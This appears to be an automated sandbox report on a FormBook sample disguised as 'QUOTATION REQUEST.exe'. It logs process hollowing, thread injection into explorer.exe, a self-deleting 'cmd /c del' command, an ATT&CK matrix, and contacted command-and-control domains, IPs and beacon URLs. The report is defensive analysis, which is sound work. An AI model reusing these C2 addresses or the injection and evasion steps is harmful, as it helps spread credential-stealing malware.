Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361C577 mov eax, dword ptr fs:[00000030h]	9_2_0361C577
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03633D43 mov eax, dword ptr fs:[00000030h]	9_2_03633D43
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03673540 mov eax, dword ptr fs:[00000030h]	9_2_03673540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036A3D40 mov eax, dword ptr fs:[00000030h]	9_2_036A3D40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03617D50 mov eax, dword ptr fs:[00000030h]	9_2_03617D50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0367A537 mov eax, dword ptr fs:[00000030h]	9_2_0367A537
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BE539 mov eax, dword ptr fs:[00000030h]	9_2_036BE539
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03603D34 mov eax, dword ptr fs:[00000030h]	9_2_03603D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8D34 mov eax, dword ptr fs:[00000030h]	9_2_036C8D34
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h]	9_2_03624D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h]	9_2_03624D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03624D3B mov eax, dword ptr fs:[00000030h]	9_2_03624D3B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035FAD30 mov eax, dword ptr fs:[00000030h]	9_2_035FAD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_036BFDE2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036A8DF1 mov eax, dword ptr fs:[00000030h]	9_2_036A8DF1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]	9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]	9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]	9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov ecx, dword ptr fs:[00000030h]	9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]	9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676DC9 mov eax, dword ptr fs:[00000030h]	9_2_03676DC9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C05AC mov eax, dword ptr fs:[00000030h]	9_2_036C05AC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C05AC mov eax, dword ptr fs:[00000030h]	9_2_036C05AC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036235A1 mov eax, dword ptr fs:[00000030h]	9_2_036235A1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]	9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]	9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]	9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]	9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_035F2D8A mov eax, dword ptr fs:[00000030h]	9_2_035F2D8A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h]	9_2_03621DB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h]	9_2_03621DB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03621DB5 mov eax, dword ptr fs:[00000030h]	9_2_03621DB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]	9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]	9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]	9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03622581 mov eax, dword ptr fs:[00000030h]	9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362FD9B mov eax, dword ptr fs:[00000030h]	9_2_0362FD9B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362FD9B mov eax, dword ptr fs:[00000030h]	9_2_0362FD9B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0361746D mov eax, dword ptr fs:[00000030h]	9_2_0361746D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362A44B mov eax, dword ptr fs:[00000030h]	9_2_0362A44B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368C450 mov eax, dword ptr fs:[00000030h]	9_2_0368C450
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368C450 mov eax, dword ptr fs:[00000030h]	9_2_0368C450
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362BC2C mov eax, dword ptr fs:[00000030h]	9_2_0362BC2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h]	9_2_036C740D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h]	9_2_036C740D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h]	9_2_036C740D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]	9_2_036B1C06
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]	9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]	9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]	9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]	9_2_03676C0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B14FB mov eax, dword ptr fs:[00000030h]	9_2_036B14FB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h]	9_2_03676CF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h]	9_2_03676CF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h]	9_2_03676CF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8CD6 mov eax, dword ptr fs:[00000030h]	9_2_036C8CD6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360849B mov eax, dword ptr fs:[00000030h]	9_2_0360849B

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.zryld.com
Source: C:\Windows\explorer.exe	Domain query: www.sloanksmith.com
Source: C:\Windows\explorer.exe	Domain query: www.pedroiniesta.net
Source: C:\Windows\explorer.exe	Domain query: www.shop-daily.info
Source: C:\Windows\explorer.exe	Domain query: www.letsratethis.com
Source: C:\Windows\explorer.exe	Domain query: www.inthebeginningshop.com
Source: C:\Windows\explorer.exe	Domain query: www.freecleanlimpieza.com
Source: C:\Windows\explorer.exe	Network Connect: 81.17.18.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.buffalobooze.com
Source: C:\Windows\explorer.exe	Domain query: www.madisonroselove.com
Source: C:\Windows\explorer.exe	Network Connect: 206.189.50.215 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.131.134 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.checkmytradesmanswork.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.colabchat.com
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.36 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.bestsellerselect.com
Source: C:\Windows\explorer.exe	Domain query: www.graet.design
Source: C:\Windows\explorer.exe	Network Connect: 46.30.211.38 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.cannabisllp.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 1260000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000002.482293325.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION REQUEST.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
QUOTATION REQUEST.exe	19%	Virustotal		Browse
QUOTATION REQUEST.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.QUOTATION REQUEST.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.madisonroselove.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.letsratethis.com/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.buffalobooze.com/n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al	0%	Avira URL Cloud	safe
www.pedroiniesta.net/n7ad/	0%	Avira URL Cloud	safe
http://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.sloanksmith.com/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.checkmytradesmanswork.com/n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.graet.design/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.madisonroselove.com/n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.inthebeginningshop.com/n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.cannabisllp.com/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.madisonroselove.com	81.17.18.196	true	true	0%, Virustotal, Browse	unknown
www.sloanksmith.com	74.208.236.36	true	true		unknown
letsratethis.com	34.102.136.180	true	false		unknown
www.pedroiniesta.net	206.189.50.215	true	true		unknown
checkmytradesmanswork.com	34.102.136.180	true	false		unknown
cannabisllp.com	34.102.136.180	true	false		unknown
inthebeginningshop.com	34.102.136.180	true	false		unknown
www.graet.design	46.30.211.38	true	true		unknown
buffalobooze.com	34.102.136.180	true	false		unknown
freecleanlimpieza.com	192.185.131.134	true	true		unknown
www.zryld.com	unknown	unknown	true		unknown
www.shop-daily.info	unknown	unknown	true		unknown
www.xoyicgv.icu	unknown	unknown	true		unknown
www.letsratethis.com	unknown	unknown	true		unknown
www.inthebeginningshop.com	unknown	unknown	true		unknown
www.freecleanlimpieza.com	unknown	unknown	true		unknown
www.buffalobooze.com	unknown	unknown	true		unknown
www.checkmytradesmanswork.com	unknown	unknown	true		unknown
www.colabchat.com	unknown	unknown	true		unknown
www.bestsellerselect.com	unknown	unknown	true		unknown
www.cannabisllp.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
